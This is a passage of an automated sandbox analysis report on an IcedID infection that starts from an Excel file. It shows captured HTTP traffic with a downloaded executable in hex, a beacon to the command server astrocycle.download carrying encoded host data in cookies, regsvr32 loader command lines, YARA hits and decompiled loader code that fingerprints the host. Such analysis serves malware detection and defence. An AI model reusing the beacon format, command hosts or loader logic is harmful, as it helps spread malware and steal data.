Jul 6, 2021 15:57:21.111716986 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 13:57:21 GMT Content-Type: application/octet-stream Content-Length: 57856 Connection: keep-alive Content-Disposition: attachment; filename=lsdfik.fml Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 49 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=e1M4Me9EvuSGct6Mnlt7EmjgYyT7e7QnarjxTYnYSbWpZmw4pdEC3zemXzCxzWNtVc2%2BlHAw4TUkyHOcVcDYdQudq6Qyn7To30GB%2FdxgsttDT34UyvuaTiL15A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a95776c9bf4e2b-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 15:57:21.111763954 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@
Jul 6, 2021 15:57:21.111799955 CEST	6	IN	Data Raw: 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00 30 00 Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
Jul 6, 2021 15:57:21.111825943 CEST	8	IN	Data Raw: 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84 24 84 Data Ascii: IH$$$H$HI HL$p$$H\|$p$$HL$pHIPHL$h$$HL$pfQHf$$$\|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hAa
Jul 6, 2021 15:57:21.111850977 CEST	9	IN	Data Raw: 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0 00 00 Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
Jul 6, 2021 15:57:21.111876011 CEST	10	IN	Data Raw: 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84 24 5c Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
Jul 6, 2021 15:57:21.111901045 CEST	12	IN	Data Raw: 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24 28 48 Data Ascii: AH(ALHT$PHT$PH$H$$H\|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ LL
Jul 6, 2021 15:57:21.111926079 CEST	13	IN	Data Raw: 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00 00 48 Data Ascii: L$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$\|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
Jul 6, 2021 15:57:21.111949921 CEST	15	IN	Data Raw: 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24 88 00 Data Ascii: H$p$\|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,H
Jul 6, 2021 15:57:21.111977100 CEST	16	IN	Data Raw: c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00 00 48 Data Ascii: HD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$\|HL$PD$+HD$HHD$PH
Jul 6, 2021 15:57:21.112560034 CEST	18	IN	Data Raw: 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00 00 00 Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	172.67.146.88	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 15:57:21.276241064 CEST	65	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: uppercilio.fun Connection: Keep-Alive
Jul 6, 2021 15:57:21.337383986 CEST	66	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 13:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 49 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=xvXAH1fkv%2BP1rEG36JlOECgAlzbUkzDIV14bCnt%2FX7IbeBIL3TccXIjMg3c2JSbweqZmhNlJONJb3zxDbutUWwxOMk8En6qnwaUg%2F55JCLoxSDHrKxnPN%2FkgU3o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a957782dd32bb9-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 15:57:21.337424040 CEST	66	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49169	172.67.213.115	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 15:57:24.022802114 CEST	325	OUT	GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3565085024:1:4921:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373234353336:416C627573:46393135334243344242303836433845; __io=0; _gid=67AFEDC5AC03 Host: astrocycle.download
Jul 6, 2021 15:57:24.586483002 CEST	326	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Jul 2021 13:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uV9QsWC152rxthQ1uxb2nhb6QfxJOBUyvZzkW%2Bm5eNZr%2FfY1OoMjjdn%2BqwGvovRoti9wtyDjMb%2BRHA3uE1%2BUl29GACROx386dHI4LZByNrW4JVScGH%2BdagSI%2FVwGO1H5CA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a957895c5cbef6-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 15:57:24.586541891 CEST	326	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 6, 2021 15:57:22.622539997 CEST	13.225.75.73	443	192.168.2.22	49168	CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2632 Parent PID: 584

General

Start time:	15:57:35
Start date:	06/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f150000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3016 Parent PID: 2632

General

Start time:	15:57:37
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XRAY.dll
Imagebase:	0xff8d0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3024 Parent PID: 2632

General

Start time:	15:57:38
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XTOWN.dll
Imagebase:	0xff8d0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, Author: Joe Security Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2088537006.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2292 Parent PID: 2632

General

Start time:	15:57:41
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XZIBIT.dll
Imagebase:	0xff8d0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 3024 Parent PID: 2632 regsvr32.exeCOMMON

Executed Functions

Function 021A27BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E021A27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E021A2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x21a70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E021A2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}

0x021a27bc
0x021a27bc
0x021a27bc
0x021a27bf
0x021a27c3
0x021a27c7
0x021a27cb
0x021a27d4
0x021a27d7
0x021a27e7
0x021a27ea
0x021a27fa
0x021a2800
0x021a2806
0x021a285f
0x021a285f
0x021a2876
0x021a287b
0x021a2893
0x021a2893
0x021a280f
0x021a2814
0x021a281f
0x021a282c
0x021a282c
0x021a282f
0x021a2835
0x021a283b
0x00000000
0x00000000
0x021a2842
0x021a2845
0x021a2849
0x021a2894
0x021a2897
0x021a289e
0x021a28a9
0x021a28b5
0x021a28b7
0x021a28ba
0x021a28c1
0x021a28c8
0x021a28cd
0x021a28d0
0x021a28d0
0x021a28b5
0x021a28d7
0x021a28da
0x021a28df
0x021a28e8
0x021a28ed
0x021a28f6
0x00000000
0x00000000
0x00000000
0x021a28fc
0x021a284b
0x021a2854
0x021a2859
0x021a2859

APIs

GetAdaptersInfo.IPHLPAPI(?,?,00000000,021A2CFE,?,?,00000003,021A24A4), ref: 021A280F
GetAdaptersInfo.IPHLPAPI(?,?,00000000,021A2CFE,?,?,00000003,021A24A4), ref: 021A2845

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction ID: 35a6f90d53341d791a7d78cf68a3db4eb3ac53b927994dc837058b21a61ed450
Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction Fuzzy Hash: E731CB7A702B8092EB15CB62E9187DAB7A0FB59F94F084035DE0D07758EF78C28AC301

Uniqueness

Uniqueness Score: -1.00%

Function 021A1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,00000000,021A2CB1,?,?,00000003,021A24A4), ref: 021A16CB
RtlAllocateHeap.NTDLL(?,?,00000000,021A2CB1,?,?,00000003,021A24A4), ref: 021A1709

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: AllocateHeapInformationQuerySystem
String ID:
API String ID: 3114120137-0
Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction ID: 1caf89246eba7d03e139869099885201e87e58fbc8784491a5330fbca156079c
Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction Fuzzy Hash: 8D21B239356B4093EF05CFA6A9293E9A2A2FB99BD0F095034DE0E47714EF7CC4458701

Uniqueness

Uniqueness Score: -1.00%

Function 021A1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 021A1A08

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction ID: 8efb00b7612a60bcc53fe84fac7a4253d37f86fb0083398bb6a1113b1436be59
Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction Fuzzy Hash: C071DC36301B919BEB24CF66E864BA937A5FB58BD8F088129EE4E53B14DF78C155C700

Uniqueness

Uniqueness Score: -1.00%

Function 021A22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

LookupAccountNameW.ADVAPI32 ref: 021A233C

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: AccountLookupName
String ID:
API String ID: 1484870144-0
Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction ID: 554f6d2a0a2bb607799ffa76fad3a1745e554d5cde8de6bb0951d25aba9d95e5
Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction Fuzzy Hash: 0C317A76706B418AEB108FB5E8583EE73A4EB49B88F584135DE4D57B18EF38C149D341

Uniqueness

Uniqueness Score: -1.00%

Function 021A2434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E021A2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E021A11FC(_t73 - 0x29, _t52);
					_t37 = E021A153C(_t73 - 0x29);
					E021A2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E021A1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E021A272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E021A1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E021A2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}

0x021a2434
0x021a2434
0x021a2434
0x021a2434
0x021a2434
0x021a2434
0x021a2434
0x021a2439
0x021a243f
0x021a244d
0x021a244d
0x021a244d
0x021a2512
0x021a2528
0x021a2450
0x021a2454
0x021a2456
0x021a245a
0x021a2460
0x021a2468
0x021a246e
0x021a2472
0x00000000
0x021a2474
0x021a2482
0x021a248c
0x021a249d
0x021a249f
0x021a24a4
0x021a24a7
0x021a24b0
0x021a24bf
0x021a24c1
0x021a24cc
0x021a24d2
0x021a24d7
0x021a24db
0x021a24e0
0x021a24e2
0x021a24f0
0x021a24f0
0x021a24fc
0x021a2501
0x021a2504
0x021a250d
0x021a250d
0x021a2504
0x021a24cc
0x021a24bf
0x00000000
0x021a24a7

APIs

SleepEx.KERNEL32 ref: 021A2468

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction ID: c4e8d29e3c5bdd94fefe04e49d2a001e70c95fe8e10ccf79bde95753302dc293
